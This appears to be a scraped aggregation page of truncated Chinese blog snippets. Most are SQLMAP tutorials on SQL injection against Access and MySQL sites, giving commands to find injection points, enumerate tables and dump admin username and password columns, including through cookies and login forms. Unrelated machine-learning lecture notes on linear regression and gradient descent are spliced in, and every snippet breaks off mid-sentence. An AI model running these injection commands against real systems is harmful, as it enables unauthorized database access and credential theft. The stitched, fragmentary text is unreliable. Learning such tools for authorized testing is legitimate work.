access 注入 ./sqlmap.py -u "url"          注入判断./sqlmap.py -u "url" --tables  跑表./sqlmap.py -u "url" --columns -T admin  猜解字段./sqlmap.py -u "url" --dump -T admin -C "username,password" mysql系列课程sqlmap -u &quo…

4.Sqlmap系列教程——post登录框注入注入点: http://xxx.xxx.com/Login.asp 注入方式一: 1.对着注入点使用burp抓包,保存txt格式文件. 2.输入命令: ./sqlmap.py -r search-test.txt -p tfUPass 注入方式二:自动搜索表单的方式 sqlmap -u http://xxx.xxx.com/Login.asp --forms 注入方式三:指定一个参数的方法 &tfUPass="…

Cookie注入: 1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.2.sqlmap命令提示符下输入下列内容进行跑表. sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2 假设返回内容如下,说明是access数据库. ------------------------- [INFO] resuming ba…

1.判断一个url是否存在注入点: .sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs 假设找到数据库:student ------------------------------ available databases] [*] student ------------------------------ 2.获取数据库中的表名: .sqlmap.py -u "http://abcd****efg.asp?id=7"…

使用sqlmap工具进行Acces注入:1.判断一个url是否存在注入点,根据返回数据判断数据库类型: .sqlmap.py -u "http://abcd****efg.asp?id=7" 假设返回内容如下: ------------------------- [INFO] resuming back-end DBMS 'microsoft access' ------------------------- 2.猜数据库表,输入: .sqlmap.py -u "http:/…

ng机器学习视频笔记(一) --线性回归.代价函数.梯度下降基础 (转载请附上本文链接--linhxx) 一.线性回归 线性回归是监督学习中的重要算法,其主要目的在于用一个函数表示一组数据,其中横轴是变量(假定一个结果只由一个变量影响),纵轴是结果. 线性回归得到的方程,称为假设函数(Hypothesis Function).当假设函数是线性函数时,其公式为: 二.代价函数 代价函数是用于评价线性回归,其公式为: 计算方式是计算每一个点在当前假设函数情况下,偏差的平方和,再取平均数.m即表示一共…

ng机器学习视频笔记(二) --梯度下降算法解释以及求解θ (转载请附上本文链接--linhxx)   一.解释梯度算法 梯度算法公式以及简化的代价函数图,如上图所示. 1)偏导数 由上图可知,在a点,其偏导数小于0,故θ减去小于0的数,相当于加上一个数.另外,从图上可以看出,在a点不是最佳点,需要继续向右移动,即a需要增加.因此符合要求. 对于在b点,可以同理得到需要减少的结果. 2)学习速率α α表示点移动向最小值点的速率,α取值需要注意. 当值太大,每次移动的距离太长,可能导致在最小值点附…

ng机器学习视频笔记(十六) --从图像处理谈机器学习项目流程 (转载请附上本文链接--linhxx) 一.概述 这里简单讨论图像处理的机器学习过程,主要讨论的是机器学习的项目流程.采用的业务示例是OCR(photo optical character recognition,照片光学字符识别),通过一张照片,识别出上面所有带字符的内容. 二.机器学习流水线 对于一个业务项目,通常机器学习是其中一部分的内容,对于整个项目而言,相当于一个流水线(pipeline). 对于OCR,主要流水线为:1-…

SQLMAP学习笔记2 Mysql数据库注入 注入流程 (如果网站需要登录,就要用到cookie信息,通过F12开发者工具获取cookie信息) sqlmap -u "URL" --cookie="名称=值; 名称=值" --batch   #其中-u参数指定目标URL,--batch参数采用默认选项.不进行询问. 结果发现是可注入的 1.sqlmap -u "url" --dbs # 获取数据库: 2.sqlmap -u "url&q…

SQLMAP学习笔记1  access注入 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL.Oracle.PostgreSQL.Microsoft SQL Server.Microsoft Access.IBM DB2.SQLite.Firebird.Sybase.SAP MaxDB.HSQLDB和Informix等多种数据库管理系统. 完全支持布尔型盲注.时间型盲注.基于错误信息的注入.联合查询注入和堆查询注入. 在数据库证书.IP地址.端口和…